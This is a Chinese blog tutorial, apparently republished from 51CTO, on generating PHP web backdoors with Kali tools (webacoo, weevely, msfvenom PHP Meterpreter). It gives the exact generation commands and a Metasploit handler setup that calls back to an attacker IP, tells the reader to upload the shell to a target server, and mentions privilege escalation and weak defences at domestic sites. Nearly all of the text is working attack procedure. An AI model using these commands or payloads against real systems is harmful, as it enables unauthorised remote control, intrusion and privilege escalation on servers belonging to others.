天天看點

kali下生成web端後門

  很多時候在滲透測試時選擇web木馬害怕用的别人的馬帶有後門,這樣自己的辛苦就要被别人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成一個自己獨特密碼的web木馬了。

 Kali Linux自帶有好幾個web木馬生成工具,下面我們來簡單看幾個:

1.webacoo後門

webacoo  -g -o test.php

-g 制作後門代碼

-o 輸出生成指定的後門程式檔案名

<a href="http://s2.51cto.com/wyfs02/M02/77/3C/wKioL1Zli82gQMVfAAAu6riv1A0061.png" target="_blank"></a>

把web後門上傳到目标伺服器後

使用kali linux通路如下

注意:上傳的路徑一定要正确

最後退出的時候使用exit退出

2.weevely

檢視幫助資訊

<a href="http://s4.51cto.com/wyfs02/M00/77/3C/wKioL1Zli8-BvBjMAAAk1biLZUM186.png" target="_blank"></a>

生成後門

下列指令可以生産混攪PHP backdoor , 密碼password 後門名字disaplay.php

weevely generate password disaplay.php

<a href="http://s1.51cto.com/wyfs02/M01/77/3C/wKioL1Zli9CTIbX0AAAzLMyt8MA048.png" target="_blank"></a>

把後門檔案上傳到伺服器後,如下指令可以成功通路

通過help看到weevely有很多的module

.net.ifaces 檢視伺服器的端口資訊

.net.scan 202.205.xx.xx 22   對伺服器某個端口掃描

3.PHP Meterpreter

metasploit有一個名為PHP Meterpreter的payload,可建立具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以制作PHP Meterpreter,指令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己監聽的IP -f raw &gt; php_meter.php

-p 設定payload

-f 設定輸出檔案格式

<a href="http://s4.51cto.com/wyfs02/M01/77/3C/wKioL1Zli8-QE6pRAAAcwP6E-4M289.png" target="_blank"></a>

<a href="http://s4.51cto.com/wyfs02/M01/77/3E/wKiom1Zli2DRN9KlAAAl3u1nWKs170.png" target="_blank"></a>

但是使用前需要注意生成檔案的第一行被注釋了,是以需要把注釋去掉才能使用

把webshell上傳到目标伺服器,本地監聽打開如下:

啟動msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162

<a href="http://s5.51cto.com/wyfs02/M00/77/3E/wKiom1Zli1_xIK6FAAAtU0mx_E0849.png" target="_blank"></a>

然後我們就可以使用kali的metasploit功能對目标伺服器進行一系列操作。

這種WEBSHELL 利用起來相當友善,輸入shell指令之後,就可以随便提權什麼的了.

1,國内的貌似沒有防護這塊的,國内大多隻防護GET POST COOKIE這些資料.

2,缺點是如果伺服器在DMZ,則失效.

3,more what .....   這種shell如果被利用多了,肯定會有硬體廠商去做防護的.

     本文轉自Tar0 51CTO部落格,原文連結:http://blog.51cto.com/tar0cissp/1720542,如需轉載請自行聯系原作者